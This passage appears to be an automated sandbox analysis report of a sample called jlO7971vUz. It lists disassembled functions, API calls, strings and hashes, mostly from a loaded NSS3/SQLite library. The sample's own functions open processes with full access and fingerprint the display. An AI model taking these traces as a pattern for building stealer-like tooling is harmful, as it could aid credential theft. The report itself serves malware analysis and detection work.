Instruction Fuzzy Hash: 856119B590016D9BDB24DB54DC48BDAB7F8BF58304F0081E9E649A6244DBB06BC9CFA1

Function 6C5DEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C5FA4A1,?,00000000,?,00000001), ref: 6C5DEF6D

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

htonl.WSOCK32(00000000,?,6C5FA4A1,?,00000000,?,00000001), ref: 6C5DEFE4
htonl.WSOCK32(?,00000000,?,6C5FA4A1,?,00000000,?,00000001), ref: 6C5DEFF1
memcpy.VCRUNTIME140(?,?,6C5FA4A1,?,00000000,?,6C5FA4A1,?,00000000,?,00000001), ref: 6C5DF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C5FA4A1,?,00000000,?,00000001), ref: 6C5DF027

Strings

dtls13, xrefs: 6C5DEF33

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: a5a6e7ae87660536729f31d3f04029fb01468bb738bf6fa1f5764251ee6002b2
Instruction ID: b48f9eb26cdab73332e652c906f8105734b9905acf82b271461ddaf41ecebf5a
Opcode Fuzzy Hash: a5a6e7ae87660536729f31d3f04029fb01468bb738bf6fa1f5764251ee6002b2
Instruction Fuzzy Hash: 4231F371A00312AFC710DF28DC80B8AB7E4EF49348F168029E8189B751E731F915CBEA

Function 6C55AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C55AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C679500,6C553F91), ref: 6C55AFD2

Part of subcall function 6C5AB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6818D0,?), ref: 6C5AB095

DER_GetInteger_Util.NSS3(?), ref: 6C55B007

Part of subcall function 6C5A6A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C551666,?,6C55B00C,?), ref: 6C5A6AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C55B02F
PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C55B046
PL_FreeArenaPool.NSS3 ref: 6C55B058
PL_FinishArenaPool.NSS3 ref: 6C55B060

Strings

security, xrefs: 6C55AFB8

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: b6b394fc720ae0f880d9ddc5e6e0abd9d62848ab60dbc1a03e76f5e50356d4b3
Instruction ID: 69907b182109bce8fcabe5f62720403f75252ff064b5a515944047798729ade5
Opcode Fuzzy Hash: b6b394fc720ae0f880d9ddc5e6e0abd9d62848ab60dbc1a03e76f5e50356d4b3
Instruction Fuzzy Hash: 54310871404300DBDB10DF24DC49BAA77A4AF8636CF500B1AF9746BBE1E7329519CB9A

Function 6C58ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C58ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C58AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C58AD23

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C58AD39

Strings

(CK_INVALID_HANDLE), xrefs: 6C58AD1C
C_MessageDecryptFinal, xrefs: 6C58ACE1
hSession = 0x%x, xrefs: 6C58ACFE, 6C58AD0E
nfl, xrefs: 6C58AD51, 6C58AD7B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nfl
API String ID: 332880674-1501056926
Opcode ID: 1fb9073401f09918d161a76684e097a0cd1da796f89fad32c84cefb0d8e54018
Instruction ID: af294b0fb2ae11ab411c9829a05736d1b4ce701fa293659cced7ce0ff27f98a6
Opcode Fuzzy Hash: 1fb9073401f09918d161a76684e097a0cd1da796f89fad32c84cefb0d8e54018
Instruction Fuzzy Hash: 1A21C8716031549FDB00DB66DDC8B6A37B5AB8231DF444825E90A9BA91DB309C18CBAE

Function 017F6690 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(013B09D8,00000000,00000000,00000000), ref: 017F66C5
GetDeviceCaps.GDI32(?,00000008), ref: 017F66D4
GetDeviceCaps.GDI32(?,0000000A), ref: 017F66E3
ReleaseDC.USER32(00000000,?), ref: 017F66F2
GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,017FE7D0,00000000,?), ref: 017F66FF
HeapAlloc.KERNEL32(00000000,?,?,?,?,017FE7D0,00000000,?), ref: 017F6706
wsprintfA.USER32 ref: 017F6720

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Strings

%dx%d, xrefs: 017F6717

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: d19b08f4e7f8740d78f9b2e124c04a3f9fb2255b482e542b123106152ac0a4e1
Instruction ID: bd129e07964dc4b394732270ef44fec6f2d3427c73286c5f622cd4e786825455
Opcode Fuzzy Hash: d19b08f4e7f8740d78f9b2e124c04a3f9fb2255b482e542b123106152ac0a4e1
Instruction Fuzzy Hash: B4215EB5E40208AFDB10DF94DC49FAEBBB8FB48711F10411CF609A7284D77599028FA0

Function 6C59CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C59CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C59CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C59D079

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 97c0b2c9550b603f09a69f23fcf6b4c0790f2a32893365dfb3bb5b71562c0082
Instruction ID: 11826b4a830d5d41055a349a86ca5396de1a9b03e33bb106d7a1d8fe1194fa02
Opcode Fuzzy Hash: 97c0b2c9550b603f09a69f23fcf6b4c0790f2a32893365dfb3bb5b71562c0082
Instruction Fuzzy Hash: 48C179B5A002599BDB20CF25CC80BDAB7B4BB88318F1441E8E94DA7741E775EE95CF90

Function 6C552C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(5C13B8AF), ref: 6C552C5D

Part of subcall function 6C5B0D30: calloc.MOZGLUE ref: 6C5B0D50
Part of subcall function 6C5B0D30: TlsGetValue.KERNEL32 ref: 6C5B0D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C552C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C552CE0

Part of subcall function 6C552E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C552CDA,?,00000000), ref: 6C552E1E
Part of subcall function 6C552E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C552E33
Part of subcall function 6C552E00: TlsGetValue.KERNEL32 ref: 6C552E4E
Part of subcall function 6C552E00: EnterCriticalSection.KERNEL32(?), ref: 6C552E5E
Part of subcall function 6C552E00: PL_HashTableLookup.NSS3(?), ref: 6C552E71
Part of subcall function 6C552E00: PL_HashTableRemove.NSS3(?), ref: 6C552E84
Part of subcall function 6C552E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C552E96
Part of subcall function 6C552E00: PR_Unlock.NSS3 ref: 6C552EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C552D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C552D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C552D3F
free.MOZGLUE(00000000), ref: 6C552D73
CERT_DestroyCertificate.NSS3(?), ref: 6C552DB8
free.MOZGLUE ref: 6C552DC8

Part of subcall function 6C553E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C553EC2
Part of subcall function 6C553E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C553ED6
Part of subcall function 6C553E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C553EEE
Part of subcall function 6C553E60: PR_CallOnce.NSS3(6C6B2AA4,6C5B12D0), ref: 6C553F02
Part of subcall function 6C553E60: PL_FreeArenaPool.NSS3 ref: 6C553F14
Part of subcall function 6C553E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C553F27

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 9ee39541c4a7764f14ae8d1a36432c916793dc8de5a1ba592c12eb0243217a64
Instruction ID: 806e9f0740de7471b3b2c646f4f08e02573f85d808ff1cf97162104ceaedc6b5
Opcode Fuzzy Hash: 9ee39541c4a7764f14ae8d1a36432c916793dc8de5a1ba592c12eb0243217a64
Instruction Fuzzy Hash: 9451FF72A042119FDB01DF69DC88B6B77E5EF84348F54083EEC5983A51E731E8268B92

Function 6C4EE890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4EE922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C4EE9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C4EEA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4EEB20
memcpy.VCRUNTIME140(?,?,?), ref: 6C4EEB57

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C4EEDC2
unknown column "%s" in foreign key definition, xrefs: 6C4EED18
foreign key on %s should reference only one column of table %T, xrefs: 6C4EEE04

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: 3acabaaa823800616839ddc2a60704d6df3e17d0fe1df083288d0821709e2c6a
Instruction ID: 0fe2da0764ec26a0746ddd66213a46a336b7dfbf5d9076a45b8e08593afd076d
Opcode Fuzzy Hash: 3acabaaa823800616839ddc2a60704d6df3e17d0fe1df083288d0821709e2c6a
Instruction Fuzzy Hash: 73027E71E0511ACFDB04CF99C4C0EAEBBB2BF8D316F1A4169D815AB751D731A942CBA0

Function 017F5000 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 017F500E

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

OpenProcess.KERNEL32(001FFFFF,00000000,017F523D,017FE289), ref: 017F504C
memset.MSVCRT ref: 017F509A
??_V@YAXPAX@Z.MSVCRT ref: 017F51EE

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 017F50BC

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 2cdb9c9080cec552d67faaf5431d0d5e878de6b6258d36d20af01a73fdcd6b86
Instruction ID: ad518deb4c812f97b3ec60882a0279522fe90475f788ff7e9e08877037c17b06
Opcode Fuzzy Hash: 2cdb9c9080cec552d67faaf5431d0d5e878de6b6258d36d20af01a73fdcd6b86
Instruction Fuzzy Hash: D7514CB0C042199BDB24DBA4DC98BEFF7B4AF54304F1041ADE315A6285EB346B88CF55

Function 6C622F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C622FFD
sqlite3_initialize.NSS3 ref: 6C623007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C623032
sqlite3_mprintf.NSS3(6C68AAF9,?), ref: 6C623073
sqlite3_free.NSS3(?), ref: 6C6230B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C6230C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C6230BB

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 2df393aef06741d5aec33b7d3a25106dd191dc1b09e8cba787cfd917d4eafedb
Instruction ID: edcb337bb7fb4e837e93e34dd8b4580dc9b5977467b137b093d87725b6339af2
Opcode Fuzzy Hash: 2df393aef06741d5aec33b7d3a25106dd191dc1b09e8cba787cfd917d4eafedb
Instruction Fuzzy Hash: 2E41A171600606AFDB10CF25D880A8AB7A9FF44368F158638EC598BB40E735F955CFE5

Function 6C568CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C57124D,00000001), ref: 6C568D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C57124D,00000001), ref: 6C568D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C57124D,00000001), ref: 6C568D73
PR_Unlock.NSS3(?,?,?,?,?,6C57124D,00000001), ref: 6C568D8C

Part of subcall function 6C5FDD70: TlsGetValue.KERNEL32 ref: 6C5FDD8C
Part of subcall function 6C5FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5FDDB4

PR_Unlock.NSS3(?,?,?,?,?,6C57124D,00000001), ref: 6C568DBA

Strings

KRAM, xrefs: 6C568D3E
KRAM, xrefs: 6C568CF9

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 136d38430a730212b879ca49d5348ff0f321333ba880ee30cd1c7b5ca8c820ce
Instruction ID: 027e029dc94831d6dc5ab7f6ad5ac812e96e89eb943db18f9aa7a9bf73331173
Opcode Fuzzy Hash: 136d38430a730212b879ca49d5348ff0f321333ba880ee30cd1c7b5ca8c820ce
Instruction Fuzzy Hash: 3F2191B1A04601CFCB40EF7AC88455EB7F0FF86314F15896AD89987B11EB30D841CBA2

Function 6C660ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C660EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C660EFA

Part of subcall function 6C54AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C54AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C660F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C660F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C660F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C660F2B

Strings

Aborting, xrefs: 6C660EB3
Assertion failure: %s, at %s:%d, xrefs: 6C660ED9, 6C660EE5, 6C660F06, 6C660F0B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 176865a679d139ff912feaa2c603b5b3fcaf951ae09f865bbf2cc4971ec75da9
Instruction ID: 90688c89869dc2e14ac73f503d24a4c7b21e21357b2b7680893cb0182743b916
Opcode Fuzzy Hash: 176865a679d139ff912feaa2c603b5b3fcaf951ae09f865bbf2cc4971ec75da9
Instruction Fuzzy Hash: A401ADB5900214BBDF01AFA6EC85CAB3F7DEF46364F004424FD0A97A01D632E91086AA

Function 6C624D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C624DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C624DE0

Strings

%s at line %d of [%.10s], xrefs: 6C624DDA
invalid, xrefs: 6C624DB8
API call with %s database connection pointer, xrefs: 6C624DBD
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C624DCB
misuse, xrefs: 6C624DD5

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 4859469503cb2adee170727cbcae306d64e27904b4b98dd7fd3468c21fb016e3
Instruction ID: 5e77514f48789aba064ddfd58cba8dfc1b75329f8cf4fe322ecc47673f9daa54
Opcode Fuzzy Hash: 4859469503cb2adee170727cbcae306d64e27904b4b98dd7fd3468c21fb016e3
Instruction Fuzzy Hash: B0F0E921F155746BD7005115DC20FE637D54F01329F4A0DE1ED04ABE92D24EAC508AEE

Function 6C624DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C624E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C624E4D

Strings

%s at line %d of [%.10s], xrefs: 6C624E47
invalid, xrefs: 6C624E25
API call with %s database connection pointer, xrefs: 6C624E2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C624E38
misuse, xrefs: 6C624E42

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
